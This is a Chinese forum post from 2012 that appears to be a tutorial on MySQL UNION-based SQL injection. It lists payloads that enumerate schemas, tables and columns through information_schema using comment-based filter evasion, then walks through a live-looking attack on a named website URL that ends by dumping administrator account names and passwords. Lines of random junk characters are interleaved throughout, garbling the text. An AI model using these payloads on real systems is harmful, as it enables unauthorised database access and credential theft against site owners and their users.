查库
: I- c. K: O* e! \7 x/ D* d. Y- A4 q! `) p; \
id=-1 union select 1,..,SCHEMA_NAME,n from/**/information_schema.SCHEMATA limit 1,1/*1 O( z# l& q2 k
% ~$ r$ ^, W G. X0 A: D4 g" a" e查表+ y! ~1 s [0 N. m' s8 _% [
0 N4 ]1 Z4 o5 ]id=-1/**/union/**/select/**/1,TABLE_NAME,N/**/from/**/information_schema.TABLES/**/where/**/TABLE_SCHEMA=库的HEX值/**/limit/**/1,1
0 Y/ G7 Y; X- d* l
1 y. V& ], n# M. U查段: _; k1 \2 |- ^5 N ?9 l
5 F# v9 i8 v( H/ a; w: e) I
id=-1/**/union/**/select/**/1,COLUMN_NAME,N/**/from/**/information_schema.COLUMNS/**/where/**/TABLE_NAME=表的HEX值/**/limit/**/1,19 r0 v4 q9 b! r$ G
; ^* e6 S% i( A! n* R7 U' ?. \% m5 d" m
mysql5高级注入方法暴表. M% Z3 P) ^+ S9 V3 E+ ~
# A2 k& e5 M( }* c$ `例子如下:1 ?( B# a6 j. O$ R% i0 A
4 H* o9 W+ I$ e$ t, U& K' l1.爆表1 b/ E+ j1 V3 p/ q
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,TABLE_NAME,5/**/From/**/information_schema.TABLES/**/Where/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* (0x79645F7465616D6E6574为数据库名的16进制转换yd_teamnet)* }( s, S5 @- C, u# B% a9 R1 [
这样爆到第4个时出现了admin_user表。8 K* B4 g* m. ]" T
' j$ ]% J9 E8 _! s% r# f2.暴字段& _# D; c3 W4 c
http://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,COLUMN_NAME,5/**/From/**/information_schema.COLUMNS/**/Where/**/TABLE_NAME=0x61646D696E5F75736572/**/And/**/TABLE_SCHEMA=0x79645F7465616D6E6574/**/limit/**/0,1/* `# O6 j+ L( y2 N
4 J8 e4 A9 q1 h1 o1 ^
( K! K# O3 Z1 h* p3 e7 W3.爆密码
4 f8 U+ u1 x# Ahttp://www.political-security.com/ccaus_content.php?ccausid=13240/**/and/**/1=2/**/union/**/select/**/1,2,3,concat(0x7c,ID,0x7c,ACCOUNT,0x7c,PASSWORD,0x7c),5/**/From/**/admin_user/**/limit/**/0,1/* ' y! w7 E) e) T
! J2 F1 e$ n# }7 J. f
, T+ W8 p9 h+ h; j
|
发表于 2012-9-13 16:29:37
收藏
支持
反对